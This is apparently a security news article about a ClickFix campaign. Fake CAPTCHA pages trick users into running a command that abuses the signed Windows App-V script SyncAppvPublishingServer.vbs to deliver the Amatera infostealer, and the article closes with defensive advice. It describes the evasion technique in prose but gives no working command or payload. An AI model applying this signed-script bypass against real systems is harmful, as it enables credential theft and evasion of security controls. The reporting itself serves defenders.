ClickFix Attacks Now Abuse Windows App-V to Deliver Malware

A new ClickFix campaign is abusing Windows Application Virtualization scripts to slip past enterprise security controls. Researchers at BlackPoint Cyber documented the attack chain this week, which tricks users with fake CAPTCHA pages then leverages signed Microsoft infrastructure to deploy the Amatera information stealer.

The technique highlights how attackers combine social engineering with living-off-the-land binaries to evade endpoint protection.

How the Attack Works

ClickFix attacks exploit what researchers call "verification fatigue"—users encounter so many CAPTCHAs daily that another one barely registers as suspicious. The fake verification page instructs victims to open Windows Run dialog and paste a command to prove they're human.

Standard ClickFix campaigns invoke PowerShell directly. This variant takes a different path.

Instead of running PowerShell, the malicious command calls SyncAppvPublishingServer.vbs—a legitimate signed Microsoft script associated with Application Virtualization (App-V). Because the script carries Microsoft's signature, security tools that block suspicious PowerShell execution may let it pass.

The App-V script then executes the actual payload, downloading Amatera from attacker-controlled infrastructure. The malware runs without touching disk, operating entirely in memory after initial download.

What Is Amatera?

Amatera emerged in June 2025 as an evolution of ACR Stealer (also known as AcridRain). It operates as malware-as-a-service, with subscriptions ranging from $199 monthly to $1,499 annually.

The infostealer targets a broad range of applications:

• Web browsers for saved credentials, session cookies, and stored credit card data
• Cryptocurrency wallets including browser extensions and desktop applications
• Messaging applications for conversation history and contact lists
• FTP clients for stored server credentials
• Email services for account access

According to eSentire research, Amatera employs "advanced evasion techniques such as WoW64 SysCalls to circumvent user-mode hooking mechanisms commonly used by sandboxes, Anti-Virus solutions, and EDR products." The malware specifically targets weaknesses in how security tools monitor 32-bit processes on 64-bit Windows systems.

Once data collection completes, everything exfiltrates to attacker infrastructure. Victims often don't realize their browsers held the keys to dozens of accounts until those credentials appear in underground markets or fuel follow-on attacks.

Why App-V Matters

Living-off-the-land techniques aren't new, but App-V abuse represents a less commonly weaponized vector. Most security teams have tuned their defenses around PowerShell and WMI. Signed Microsoft scripts that legitimately call PowerShell create a blind spot.

The SyncAppvPublishingServer.vbs script exists to manage application publishing in enterprise environments using Microsoft's App-V technology. It's present on systems where App-V is installed—typically managed Windows endpoints in corporate environments.

Attackers can abuse it because:

1. The script is signed by Microsoft
2. It legitimately executes PowerShell code
3. Security tools may whitelist it based on signature validation
4. Few organizations monitor App-V script execution specifically

This mirrors how attackers previously abused other LOLBins like mshta.exe, wmic.exe, and certutil.exe before defenders caught on.

Defending Against ClickFix

The fundamental defense is user awareness. No legitimate website will ever ask users to paste commands into the Windows Run dialog. Train users to recognize this as an immediate red flag, regardless of how convincing the CAPTCHA page appears.

Technical controls that help:

1. Restrict Run dialog access through Group Policy where operationally feasible
2. Remove App-V components from systems that don't require application virtualization
3. Enable PowerShell Script Block Logging to capture commands executed through indirect paths
4. Monitor for TLS SNI mismatches where the HTTP Host header doesn't match the destination IP
5. Block or sandbox unknown websites presenting CAPTCHA-style challenges

For organizations that can't restrict the Run dialog, application whitelisting that prevents unauthorized script execution provides a fallback.

The Bigger Picture

ClickFix has evolved steadily since first appearing. We've covered campaigns where attackers distributed infostealers through fake job interviews using similar social engineering tactics. The Lazarus group adopted the technique for targeted operations; this campaign takes a spray-and-pray approach to enterprise credential theft.

The combination of MaaS infostealers with creative delivery mechanisms creates a mature ecosystem. Operators don't need sophisticated capabilities themselves—they purchase Amatera subscriptions, customize delivery through available techniques, and monetize stolen data through established underground channels.

Expect continued innovation in LOLBin abuse as defenders improve PowerShell monitoring. The arms race between security tooling and evasion techniques shows no signs of slowing.